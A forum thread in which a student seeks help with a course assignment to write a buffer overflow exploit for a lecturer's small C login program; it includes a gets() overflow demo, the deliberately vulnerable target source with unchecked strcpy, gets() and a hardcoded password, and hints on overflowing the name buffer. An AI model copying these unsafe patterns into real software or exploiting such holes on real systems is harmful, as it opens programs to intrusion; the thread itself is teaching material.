C Exploit

Hi,

My lecturer has given us a simple program he has written in C and wants us to write an exploit for it. I am not asking someone to do it more some guidance. If your interested and maybe could help that would be great :)

what kind of program are you trying to exploit?

it is a simple enter name and enter password, then if you get the password correct you are given a shell. He is looking for us to write a buffer overflow for it…

i actually have a piece of code that demonstrates a simple buffer overflow:

 * buffer_overrun.c
 * A simple little c program to demonstrate why gets() is bad
 *
 * if you enter a butt-load of stuff for foo, it will overwrite the info for bar
 * **************************/

#include <stdio.h>
#include <stdlib.h>

int main(void) {
	char* foo = (char*)malloc(sizeof(char));
	char* bar = (char*)malloc(5*sizeof(char));
	*foo = 'x';
	bar[0] = 'b';
	bar[1] = 'a';
	bar[2] = 'r';
	bar[3] = '\0';

	printf("foo is '%c'\n",*foo);
	printf("bar is '%s'\n",bar);
	printf("Enter new value for foo: ");
	foo[-2]='e';
	gets(foo);
	printf("foo is '%c'\n",*foo);
	printf("bar is '%s'\n",bar);
	return 0;
}```

so when it prompts you to enter a new value for 'foo', just type a whole line full of random letters, and you should see that that information overwrites the data stored into the variable 'bar'. this is why gets() has been replaced with scanf() and the man page for gets() specifically says not to use it.

i dont know if that's any help to you, but i tried.

thanks a lot for that, it definitely helps me :)

just in case anyone is interested the code we have to exploit is below

#include <string.h>

int checkPass(char *Pbuffer)
{
if (!strcmp(Pbuffer,"password"))
  {
  return (1);
  }
else
  {
  printf("Incorrect password\n");
  return (0);
  }
}

void secretArea (void)
{
puts("Congratulation you have access!");
system("xterm");
}

int checkName(int argc, char **argv)
{
char Ubuffer [30];
int flag=1;

if (argc>1)
  strcpy(Ubuffer,argv[1]);

while (flag==1)
  {
  if (!strcmp(Ubuffer,"Nick"))
    {
    printf("Hello Nick");
    return(1);
    }
  printf("Wrong Name\n");
  return(0);
  }
}

int main (int argc, char **argv)
{
char Pbuffer [30];
if (!checkName(argc,argv))
  {return(0); }
printf("\nPlease enter password: ");
gets(Pbuffer);
if (checkPass(Pbuffer))
 {
 secretArea();
 }
return 0;
}```

you should edit your post to disable smileys. it'll be easier to read that way.

how exactly does your teacher want you to exploit this? since you know the username and password, you can easily get into the secret area without writing any code.

you probably know this by looking at the code, but the password is 'password' and once entered are given a terminal.

He wants us to write a bit of code that gives you access to the terminal and gets passed the log in without using 'password' as the password..

As a big help the vulnerable line is :

 strcpy(Ubuffer,argv[1]);

try running the program and see what happens if you feed alot of A's as the username, you'll get a runtime error. Also if you are compiling this code under windows you need to include stdlib.h for the system function otherwise you get a compile error.

If you want any help feel free to message me at xero-tech@hotmail.com via msn. Just know I won't give you the answer but I'll gladly help you there

exploit is now all written :) great help from DigitalOutcast thank you!

DigitalOutcast wrote: Also if you are compiling this code under windows you need to include stdlib.h for the system function otherwise you get a compile error.

No need for that ^^ ;)